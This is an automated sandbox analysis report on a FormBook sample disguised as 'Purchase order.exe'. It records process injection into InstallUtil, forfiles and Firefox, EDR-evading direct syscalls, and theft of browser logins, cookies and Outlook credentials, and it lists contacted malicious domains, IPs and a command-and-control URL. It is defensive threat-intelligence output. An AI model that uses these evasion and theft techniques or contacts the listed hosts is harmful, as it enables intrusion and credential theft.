Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01798AA0 mov eax, dword ptr fs:[00000030h] 2_2_01798AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01798AA0 mov eax, dword ptr fs:[00000030h] 2_2_01798AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017E6AA4 mov eax, dword ptr fs:[00000030h] 2_2_017E6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0183EA60 mov eax, dword ptr fs:[00000030h] 2_2_0183EA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017C8A90 mov edx, dword ptr fs:[00000030h] 2_2_017C8A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0180CA72 mov eax, dword ptr fs:[00000030h] 2_2_0180CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0180CA72 mov eax, dword ptr fs:[00000030h] 2_2_0180CA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0179EA80 mov eax, dword ptr fs:[00000030h] 2_2_0179EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01790D59 mov eax, dword ptr fs:[00000030h] 2_2_01790D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01790D59 mov eax, dword ptr fs:[00000030h] 2_2_01790D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01790D59 mov eax, dword ptr fs:[00000030h] 2_2_01790D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01798D59 mov eax, dword ptr fs:[00000030h] 2_2_01798D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01798D59 mov eax, dword ptr fs:[00000030h] 2_2_01798D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01798D59 mov eax, dword ptr fs:[00000030h] 2_2_01798D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01798D59 mov eax, dword ptr fs:[00000030h] 2_2_01798D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_01798D59 mov eax, dword ptr fs:[00000030h] 2_2_01798D59
Enables debug privileges
Source: C:\Users\user\Desktop\Purchase order.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtAllocateVirtualMemory: Direct from: 0x77172BFC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtDelayExecution: Direct from: 0x77172DDC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtProtectVirtualMemory: Direct from: 0x77167B2E Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtQuerySystemInformation: Direct from: 0x77172DFC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtReadFile: Direct from: 0x77172ADC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtQueryInformationProcess: Direct from: 0x77172C26 Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtResumeThread: Direct from: 0x77172FBC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtWriteVirtualMemory: Direct from: 0x7717490C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtCreateUserProcess: Direct from: 0x7717371C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtOpenKeyEx: Direct from: 0x77172B9C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtNotifyChangeKey: Direct from: 0x77173C2C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtSetInformationProcess: Direct from: 0x77172C5C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtProtectVirtualMemory: Direct from: 0x77172F9C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtResumeThread: Direct from: 0x771736AC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtMapViewOfSection: Direct from: 0x77172D1C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtWriteVirtualMemory: Direct from: 0x77172E3C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtCreateMutant: Direct from: 0x771735CC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtDeviceIoControlFile: Direct from: 0x77172AEC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtAllocateVirtualMemory: Direct from: 0x77172BEC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtTerminateThread: Direct from: 0x77172FCC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtQueryInformationToken: Direct from: 0x77172CAC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtCreateFile: Direct from: 0x77172FEC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtOpenFile: Direct from: 0x77172DCC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtClose: Direct from: 0x77172B6C
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtSetInformationThread: Direct from: 0x771663F9 Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtAllocateVirtualMemory: Direct from: 0x77173C9C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtQueryAttributesFile: Direct from: 0x77172E6C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtSetInformationThread: Direct from: 0x77172B4C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtReadVirtualMemory: Direct from: 0x77172E8C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtCreateKey: Direct from: 0x77172C6C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtQueryVolumeInformationFile: Direct from: 0x77172F2C Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtAllocateVirtualMemory: Direct from: 0x771748EC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtQuerySystemInformation: Direct from: 0x771748CC Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe NtOpenSection: Direct from: 0x77172E0C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Purchase order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: NULL target: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: NULL target: C:\Windows\SysWOW64\forfiles.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: NULL target: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: NULL target: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\forfiles.exe Thread register set: target process: 4888 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\forfiles.exe Thread APC queued: target process: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Purchase order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: E90008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Purchase order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Program Files (x86)\pHedyemeNrsKAMVOMFAyjfTDLetAXNIioubijYnxnSIUMKQotDHpFrTlUUpSWArsrYsOAOl\iveUJ72crs3yyPj.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\SysWOW64\forfiles.exe" Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: iveUJ72crs3yyPj.exe, 00000004.00000002.2616795755.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000004.00000000.1827922647.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2617582439.0000000001081000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: iveUJ72crs3yyPj.exe, 00000004.00000002.2616795755.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000004.00000000.1827922647.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2617582439.0000000001081000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: iveUJ72crs3yyPj.exe, 00000004.00000002.2616795755.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000004.00000000.1827922647.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2617582439.0000000001081000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerW
Source: iveUJ72crs3yyPj.exe, 00000004.00000002.2616795755.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000004.00000000.1827922647.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2617582439.0000000001081000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Purchase order.exe Queries volume information: C:\Users\user\Desktop\Purchase order.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2615984207.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2617306934.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1905455686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2615715493.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1981834340.00000000063C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2616880626.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1911046997.0000000003980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2617251944.0000000005000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\forfiles.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\forfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2615984207.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2617306934.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1905455686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2615715493.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1981834340.00000000063C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2616880626.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1911046997.0000000003980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2617251944.0000000005000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1651062 Sample: Purchase order.exe Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 28 www.mslgdkor.xyz 2->28 30 www.v153cbo9xcl49.buzz 2->30 32 2 other IPs or domains 2->32 40 Suricata IDS alerts for network traffic 2->40 42 Antivirus detection for URL or domain 2->42 44 Multi AV Scanner detection for submitted file 2->44 48 6 other signatures 2->48 10 Purchase order.exe 2 2->10         started        signatures3 46 Performs DNS queries to domains with low reputation 28->46 process4 signatures5 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->60 62 Writes to foreign memory regions 10->62 64 Injects a PE file into a foreign processes 10->64 13 InstallUtil.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 iveUJ72crs3yyPj.exe 13->16 injected process8 signatures9 38 Found direct / indirect Syscall (likely to bypass EDR) 16->38 19 forfiles.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 iveUJ72crs3yyPj.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.mslgdkor.xyz 172.67.205.132, 49693, 80 CLOUDFLARENETUS United States 22->34 36 94950.bodis.com 199.59.243.228, 49694, 49695, 49696 BODIS-NJUS United States 22->36 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.205.132
 www.mslgdkor.xyz United States
13335 CLOUDFLARENETUS true
199.59.243.228
 www.bolaemas88.online United States
395082 BODIS-NJUS false

Contacted Domains

Name IP Active
www.bolaemas88.online 199.59.243.228 true
94950.bodis.com 199.59.243.228 true
www.mslgdkor.xyz 172.67.205.132 true
www.v153cbo9xcl49.buzz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.mslgdkor.xyz/v65o/?PJHp9d=VqSAL9WTV7zchNt/0oSiL6Nu4I33Tdmkfhtz7fksE6sNrHQ8gHPIdfTZPfapnvCf2ySdC7NSRvCAaHzRgotZC8MEAkSWPQHwkIzkhdJVEMoG87S7evgDDAoJKAHwSzvonkDGBYo=&9v0d3=Mp0DRHEP true
  • Avira URL Cloud: malware
 unknown
http://www.v153cbo9xcl49.buzz/7y0v/ true
  • Avira URL Cloud: safe
 unknown
http://www.bolaemas88.online/5k0h/ true
  • Avira URL Cloud: safe
 unknown